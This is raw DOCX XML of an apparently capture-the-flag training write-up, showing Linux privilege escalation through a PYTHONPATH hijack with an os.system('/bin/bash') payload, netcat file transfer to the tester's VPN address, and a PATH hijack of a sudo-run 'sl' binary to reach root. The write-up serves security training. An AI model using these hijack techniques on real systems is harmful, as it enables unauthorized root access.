        <w:t xml:space="preserve">leia</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5F">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9v2374d3rvkn" w:id="10"/>
      <w:bookmarkEnd w:id="10"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Payload:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000060">
      <w:pPr>
        <w:jc w:val="both"/>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os.system("/bin/bash")</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000006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95500"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="87" name="image43.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image43.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId37"/>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execute the script as follows:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000063">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-u leia PYTHONPATH=/tmp/ /usr/bin/python3.7 /opt/</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Mono" w:cs="Roboto Mono" w:eastAsia="Roboto Mono" w:hAnsi="Roboto Mono"/>
          <w:color w:val="188038"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">bingo.py</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000006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running the script, we get a shell as user </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">leia</w:t>
      </w:r>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6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92300"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="65"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leia’s home directory, we obtain the fourth flag.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000006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92200"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="81" name="image33.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image33.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId39"/>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Rule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto Mono" w:cs="Roboto Mono" w:eastAsia="Roboto Mono" w:hAnsi="Roboto Mono"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="188038"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">As user leia, we run </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Mono" w:cs="Roboto Mono" w:eastAsia="Roboto Mono" w:hAnsi="Roboto Mono"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="188038"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo -l</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000006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see a similar configuration as before.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000006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95500"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="60"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execute the binary </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sl</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> as root without a password, and we can also set environment variables =)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000006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executing the binary, we see a locomotive passing across the screen 🤣</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000006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17700"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="64"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One thing that caught my attention is that when running the binary, it appears to execute the command </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ls</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, listing the current directory.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000006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36700"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="84" name="image28.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image28.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId42"/>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 confirm this, I will transfer the binary to my machine for analysis.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000007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First, I will upload a static Netcat binary to the server so that I can download the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Mono" w:cs="Roboto Mono" w:eastAsia="Roboto Mono" w:hAnsi="Roboto Mono"/>
          <w:color w:val="188038"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sl</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> binary to my machine.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000072">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Static Netcat binary:</w:t>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:hyperlink r:id="rId43">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
            <w:color w:val="1155cc"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://github.com/andrew-d/static-binaries/blob/master/binaries/linux/x86_64/ncat</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000007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95500"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="75" name="image21.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image21.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId44"/>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57400"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="59" name="image24.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image24.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId45"/>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Netcat binary on the server, we execute:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000007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nc -lvp 4444 &gt; sl</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000007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19300"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="80" name="image34.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image34.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId46"/>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B">
      <w:pPr>
        <w:jc w:val="both"/>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C">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./ncat &lt;IP-VPN&gt; 4444 &lt; sl</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000007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68500"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="78" name="image23.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image23.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId47"/>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have the binary on our machine =)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000007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81200"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="56"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analyze it using </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ltrace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8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ltrace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is a Linux debugging utility used to display calls made by a user-space application to shared libraries.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000008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ltrace ./sl 2&gt; output2.txt</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000008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62200"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="63" name="image14.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image14.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId49"/>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From the output, we can see that it calls the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ls</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command directly without using the full path. That means we can manipulate the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">PATH</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environment variable using our SETENV capability.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000008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Knowing this, we return to exploitation.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000008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go to </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/tmp</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> and create a malicious </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ls</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> file with the following payload:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000008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w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000008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w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000008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41500"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="86" name="image44.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image44.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId50"/>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execute:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000008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PATH=/tmp/:$PATH /bin/sl</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000008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are root =)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000008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06600"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="96" name="image45.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image45.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId51"/>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just need to read the final flag — but first we must export the correct PATH 😅</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000009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71700"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="82" name="image32.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image32.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId52"/>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sectPr>
      <w:headerReference r:id="rId53" w:type="default"/>
      <w:headerReference r:id="rId54" w:type="first"/>
      <w:headerReference r:id="rId55" w:type="even"/>
      <w:footerReference r:id="rId56" w:type="default"/>
      <w:footerReference r:id="rId57" w:type="first"/>
      <w:footerReference r:id="rId58"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94">
    <w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
      </w:rPr>
    </w:pPr>
    <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_heading=h.175f5cs94z0o" w:id="11"/>
    <w:bookmarkEnd w:id="11"/>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90" name="image29.jpg"/>
          <a:graphic>
            <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
              <pic:pic>
                <pic:nvPicPr>
                  <pic:cNvPr id="0" name="image29.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95">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96">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6.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5" name="image1.png"/>
          <a:graphic>
            <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
              <pic:pic>
                <pic:nvPicPr>
                  <pic:cNvPr id="0" name="image1.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BankHi</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46.png"/>
              <a:graphic>
                <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                  <pic:pic>
                    <pic:nvPicPr>
                      <pic:cNvPr id="0" name="image46.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6.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42" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image28.png"/><Relationship Id="rId41" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image15.png"/><Relationship Id="rId44" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image21.png"/><Relationship Id="rId43" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/andrew-d/static-binaries/blob/master/binaries/linux/x86_64/ncat" TargetMode="External"/><Relationship Id="rId46" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image34.png"/><Relationship Id="rId45"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48" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image2.png"/><Relationship Id="rId47" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image23.png"/><Relationship Id="rId49"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pp.hackingclub.com/training/training-machines/24" TargetMode="External"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://discord.com/channels/705946302105649153/1173705871046475796" TargetMode="External"/><Relationship Id="rId31" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image40.png"/><Relationship Id="rId30" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image19.png"/><Relationship Id="rId33" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image25.png"/><Relationship Id="rId32" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image26.png"/><Relationship Id="rId35" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image18.png"/><Relationship Id="rId34" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image4.png"/><Relationship Id="rId37" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image43.png"/><Relationship Id="rId36" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image39.png"/><Relationship Id="rId39" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image33.png"/><Relationship Id="rId38" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image8.png"/><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image3.png"/><Relationship Id="rId22" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image37.png"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image16.png"/><Relationship Id="rId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image20.png"/><Relationship Id="rId23" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image12.png"/><Relationship Id="rId26" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image9.png"/><Relationship Id="rId25" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image31.png"/><Relationship Id="rId28" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image30.png"/><Relationship Id="rId27" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.revshells.com/" TargetMode="External"/><Relationship Id="rId29" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image41.png"/><Relationship Id="rId51" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image45.png"/><Relationship Id="rId50" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image44.png"/><Relationship Id="rId53" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header1.xml"/><Relationship Id="rId52" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image32.png"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image35.png"/><Relationship Id="rId55" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header3.xml"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image13.png"/><Relationship Id="rId54" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header2.xml"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image10.png"/><Relationship Id="rId57" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer2.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image11.png"/><Relationship Id="rId56" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer1.xml"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image5.png"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image17.png"/><Relationship Id="rId58" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer3.xml"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image38.png"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image42.png"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image22.png"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image36.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9.jpg"/><Relationship Id="rId2"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03GUzlEG+TJ4+yQeNznNiEEBzQ==">CgMxLjAyDmgubWQ1eDI5eGxxOGRpMg5oLncxaGN6OHhqcnZmNTIOaC42Z2p5eWZ3eWl1MDIyDmgubGUzYWxjYXhkZjRvMg5oLmtidXpxOXlxaGRnYzINaC5mdXNlNmt5bHQ1ZTIOaC5pamZrcTdrcWxpbWoyDmgubTUxaHJ2YzkwNnF4Mg5oLm13NnZtYzJmYWRtejIOaC44eml6MnVyd2toYjQyDmguOXYyMzc0ZDNydmtuMg5oLjE3NWY1Y3M5NHowbzgAciExSzR2M3hRQVUyTXQzaTZyRU02R2k3Q0VWaEl4VkN6e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